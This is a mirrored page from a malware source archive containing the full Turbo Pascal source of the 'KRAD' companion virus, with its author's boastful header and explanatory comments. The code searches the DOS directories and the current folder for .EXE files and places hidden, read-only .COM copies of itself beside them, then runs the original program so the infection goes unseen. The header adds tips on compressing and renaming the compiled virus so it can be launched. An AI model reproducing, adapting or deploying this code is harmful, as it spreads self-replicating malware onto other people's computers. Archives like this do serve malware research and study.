mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
4b9382ddbc
push
138 lines
5.5 KiB
ObjectPascal
138 lines
5.5 KiB
ObjectPascal
Program KRAD;
|
|
|
|
{ ____ _____ _______ ______
|
|
/___/\/____/\ /______/\ /_____/\___ __/\_____
|
|
\ \| \ \___| \ | \___/ /_ ___/ BOOM! <======
|
|
\ \/___| + \| + |/ /_/\/
|
|
\______|\___________|\___________/
|
|
|
|
|
|
Virus Laboratories and Distribution
|
|
Proudly present the KRAD Virus
|
|
Written by Metabolis for non assembler ppls
|
|
|
|
|
|
Why call it the KRAD virus? Cos it is! A companion virus
|
|
written in Turbo Pascal, well that just sums it up. I wrote
|
|
this for two reasons.. 1) Not everyone knows assembler 2)
|
|
a friend reckoned a virus couldn't be programmed in Turbo
|
|
Pascal.. (by that he meant *I* couldn't do it). No matter
|
|
how lame.. it's still a virus! (Right up there with Aids/
|
|
Number 1 :)) Fully commented for non understanding Pascal
|
|
people, (a very small part of the world).
|
|
|
|
Compress this with DIET/PkLite/LZEXE or something similar
|
|
when it's compiled. Then rename it to a .COM file and hey
|
|
presto, you can run it! I guess an added bonus of this
|
|
virus is, if there's another companion virus on your system
|
|
it won't overwrite it, it will take that as an infection
|
|
and leave it alone.
|
|
|
|
KRAD virus will immediately infect C:\DOS or C:\MSDOS if
|
|
they exist, so if any DOS .EXE files are run it will infect
|
|
all the files in the current dir that you ran the DOS
|
|
command from. }
|
|
|
|
Uses Dos,Crt; {Even if I don't use one of 'em..
|
|
it's best to include both. }
|
|
|
|
{$M 59999,0,8000} {This program needs memory for two things..
|
|
1) To use as a buffer when copying the virus
|
|
2) To execute the program originally run. }
|
|
|
|
Var Inf,Inf2:Searchrec; {Used in the EXE and file_exist routines }
|
|
Infected:Boolean; {Is a file infected? }
|
|
Params:Byte; {Loop Index for adding all parameters together }
|
|
All_Params:String; {This string contains the whole list of parameters
|
|
originally passed to the program }
|
|
P:PathStr; { Used by the FSplit procedure. }
|
|
D:DirStr; { "" }
|
|
N:NameStr; { "" }
|
|
E:ExtStr; { "" }
|
|
|
|
Procedure Check_Infected(Path:String);
|
|
{Is the .EXE file we've found infected? }
|
|
Begin
|
|
FSplit(Inf.Name,D,N,E); {Split it up into directory, name
|
|
and extension. }
|
|
FindFirst(Path+N+'.COM',Anyfile,Inf2); {Look for the .COM file with the
|
|
same file name, if this exists
|
|
then the file is already infected. }
|
|
Infected:=(DosError=0); {Set the Infected flag }
|
|
End;
|
|
|
|
Procedure CopyFile(SourceFile, TargetFile:string);
|
|
{Straight Forward copying routine, I won't comment all of this.. }
|
|
var
|
|
Source,
|
|
Target : file;
|
|
BRead,
|
|
Bwrite : word;
|
|
FileBuf : array[1..2048] of char;
|
|
Begin
|
|
Assign(Source,SourceFile);
|
|
SetFattr(Source,$20); {Set the file attributes of the
|
|
hidden COM companion we're going
|
|
to be copying to archive so that
|
|
it's possible read it. }
|
|
{$I-}
|
|
Reset(Source,1);
|
|
{$I+}
|
|
If IOResult < 0 then
|
|
Begin
|
|
Exit; {Couldn't open the source file! }
|
|
End;
|
|
Assign(Target,TargetFile);
|
|
{$I-}
|
|
Rewrite(Target,1);
|
|
{$I+}
|
|
If IOResult < 0 then
|
|
Begin
|
|
Exit; {Couldn't open the target file! }
|
|
End;
|
|
Repeat
|
|
BlockRead(Source,FileBuf,SizeOf(FileBuf),BRead);
|
|
BlockWrite(Target,FileBuf,Bread,Bwrite);
|
|
Until (Bread = 0) or (Bread < BWrite);
|
|
Close(Source);
|
|
Close(Target);
|
|
SetFattr(Source,3); {Set the COM companion that we
|
|
copied back to hidden and
|
|
read-only. }
|
|
SetFattr(Target,3);
|
|
End;
|
|
|
|
Procedure FaI(Path:String);
|
|
{Find and Infect!}
|
|
Begin
|
|
FindFirst(Path+'*.EXE',AnyFile,Inf); {Check for .EXEs to infect! }
|
|
While DosError=0 Do Begin
|
|
Infected:=False;
|
|
Check_Infected(Path); { Check if the .EXE found is already infected. }
|
|
If Not Infected then Begin
|
|
CopyFile(ParamStr(0),Path+N+'.COM');
|
|
End;
|
|
{ If the file isn't infected then copy the .COM version of the
|
|
file you're executing to companionship with the .EXE you have
|
|
found that isn't infected. }
|
|
FindNext(Inf);
|
|
End;
|
|
End;
|
|
|
|
Begin
|
|
FaI('C:\DOS\'); { Find & Infect! Go for the DOS dirs first }
|
|
FaI('C:\MSDOS\'); { because this is where most EXE files will }
|
|
FaI(''); { be executed from! }
|
|
FSplit(ParamStr(0),D,N,E); { Make sure we have the path and name of the
|
|
file we actually want to execute. }
|
|
All_Params:=''; { "Remember to initialise those variables!" - Teacher }
|
|
For Params:=1 To ParamCount
|
|
do All_Params:=All_Params+ParamStr(Params)+' ';
|
|
Exec(D+N+'.EXE',All_Params); {Execute the file that the user
|
|
wanted to in the first place
|
|
keeping all original parameters. }
|
|
End.
|
|
{Easy wasn't it? I thought so.. }
|
|
|
|
This page hosted by Get your own Free Homepage
|